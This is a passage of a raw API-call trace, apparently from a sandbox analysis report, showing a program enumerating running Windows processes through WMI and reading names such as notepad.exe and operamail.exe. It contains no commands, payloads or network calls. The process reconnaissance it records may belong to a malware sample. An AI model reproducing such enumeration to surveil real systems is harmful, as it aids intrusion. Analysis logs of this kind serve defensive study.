Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.333] WbemDefPath:IUnknown:Release (This=0x5ebb040) returned 0x3 [0225.333] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.333] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.333] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.333] WbemDefPath:IUnknown:Release (This=0x5eb8e38) returned 0x2 [0225.333] WbemDefPath:IUnknown:Release (This=0x5eb8e38) returned 0x1 [0225.333] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.334] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8e38, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8e38) returned 0x0 [0225.334] WbemDefPath:IUnknown:AddRef (This=0x5eb8e38) returned 0x3 [0225.334] WbemDefPath:IUnknown:Release (This=0x5eb8e38) returned 0x2 [0225.334] WbemDefPath:IWbemPath:SetText (This=0x5eb8e38, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.334] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.334] IWbemClassObject:Get (in: This=0x5ebc058, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f39e4*=0, plFlavor=0x26f39e8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x26f39e4*=8, plFlavor=0x26f39e8*=0) returned 0x0 [0225.334] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0225.334] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0225.334] IWbemClassObject:Get (in: This=0x5ebc058, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f39e4*=8, plFlavor=0x26f39e8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x26f39e4*=8, plFlavor=0x26f39e8*=0) returned 0x0 [0225.335] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0225.335] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0225.335] CoTaskMemAlloc (cb=0x4) returned 0x5ebb070 [0225.335] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb070, puReturned=0x26dde18 | out: apObjects=0x5ebb070*=0x5ebc1f0, puReturned=0x26dde18*=0x1) returned 0x0 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc1f0) returned 0x0 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.338] IUnknown:AddRef (This=0x5ebc1f0) returned 0x3 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.338] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc1f4) returned 0x0 [0225.339] IMarshal:GetUnmarshalClass (in: This=0x5ebc1f4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.339] IUnknown:Release (This=0x5ebc1f4) returned 0x3 [0225.339] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.339] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.339] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.339] IUnknown:Release (This=0x5ebc1f0) returned 0x2 [0225.339] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.339] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.339] IUnknown:QueryInterface (in: This=0x5ebc1f0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc1f0) returned 0x0 [0225.339] IUnknown:AddRef (This=0x5ebc1f0) returned 0x4 [0225.339] IUnknown:Release (This=0x5ebc1f0) returned 0x3 [0225.339] IUnknown:Release (This=0x5ebc1f0) returned 0x2 [0225.339] CoTaskMemFree (pv=0x5ebb070) [0225.339] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.339] IUnknown:AddRef (This=0x5ebc1f0) returned 0x3 [0225.339] IWbemClassObject:Get (in: This=0x5ebc1f0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.340] IWbemClassObject:Get (in: This=0x5ebc1f0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.340] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x66 [0225.340] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x66 [0225.340] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.340] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.340] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.340] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.341] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb070) returned 0x0 [0225.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb070, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.342] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb070, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8f18) returned 0x0 [0225.342] WbemDefPath:IUnknown:Release (This=0x5ebb070) returned 0x0 [0225.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8f18) returned 0x0 [0225.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.343] WbemDefPath:IUnknown:AddRef (This=0x5eb8f18) returned 0x3 [0225.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb080) returned 0x0 [0225.343] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb080, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.343] WbemDefPath:IUnknown:Release (This=0x5ebb080) returned 0x3 [0225.343] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.343] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.343] WbemDefPath:IUnknown:Release (This=0x5eb8f18) returned 0x2 [0225.343] WbemDefPath:IUnknown:Release (This=0x5eb8f18) returned 0x1 [0225.343] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.343] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8f18, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8f18) returned 0x0 [0225.343] WbemDefPath:IUnknown:AddRef (This=0x5eb8f18) returned 0x3 [0225.343] WbemDefPath:IUnknown:Release (This=0x5eb8f18) returned 0x2 [0225.343] WbemDefPath:IWbemPath:SetText (This=0x5eb8f18, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.344] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.344] IWbemClassObject:Get (in: This=0x5ebc1f0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f4250*=0, plFlavor=0x26f4254*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x26f4250*=8, plFlavor=0x26f4254*=0) returned 0x0 [0225.344] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0225.344] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0225.344] IWbemClassObject:Get (in: This=0x5ebc1f0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f4250*=8, plFlavor=0x26f4254*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x26f4250*=8, plFlavor=0x26f4254*=0) returned 0x0 [0225.344] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0225.344] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0225.344] CoTaskMemAlloc (cb=0x4) returned 0x5ebb0b0 [0225.345] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebb0b0, puReturned=0x26dde18 | out: apObjects=0x5ebb0b0*=0x5ebc388, puReturned=0x26dde18*=0x1) returned 0x0 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebc388) returned 0x0 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.346] IUnknown:AddRef (This=0x5ebc388) returned 0x3 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.346] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebc38c) returned 0x0 [0225.346] IMarshal:GetUnmarshalClass (in: This=0x5ebc38c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.346] IUnknown:Release (This=0x5ebc38c) returned 0x3 [0225.347] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.347] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.347] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.347] IUnknown:Release (This=0x5ebc388) returned 0x2 [0225.347] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.347] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.347] IUnknown:QueryInterface (in: This=0x5ebc388, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebc388) returned 0x0 [0225.347] IUnknown:AddRef (This=0x5ebc388) returned 0x4 [0225.347] IUnknown:Release (This=0x5ebc388) returned 0x3 [0225.347] IUnknown:Release (This=0x5ebc388) returned 0x2 [0225.347] CoTaskMemFree (pv=0x5ebb0b0) [0225.347] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.347] IUnknown:AddRef (This=0x5ebc388) returned 0x3 [0225.348] IWbemClassObject:Get (in: This=0x5ebc388, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.348] IWbemClassObject:Get (in: This=0x5ebc388, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2212\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.348] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2212\"") returned 0x66 [0225.348] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2212\"") returned 0x66 [0225.348] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.348] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.348] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.348] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.350] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb0b0) returned 0x0 [0225.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb0b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.350] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb0b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec23e8) returned 0x0 [0225.350] WbemDefPath:IUnknown:Release (This=0x5ebb0b0) returned 0x0 [0225.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec23e8) returned 0x0 [0225.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec23e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, 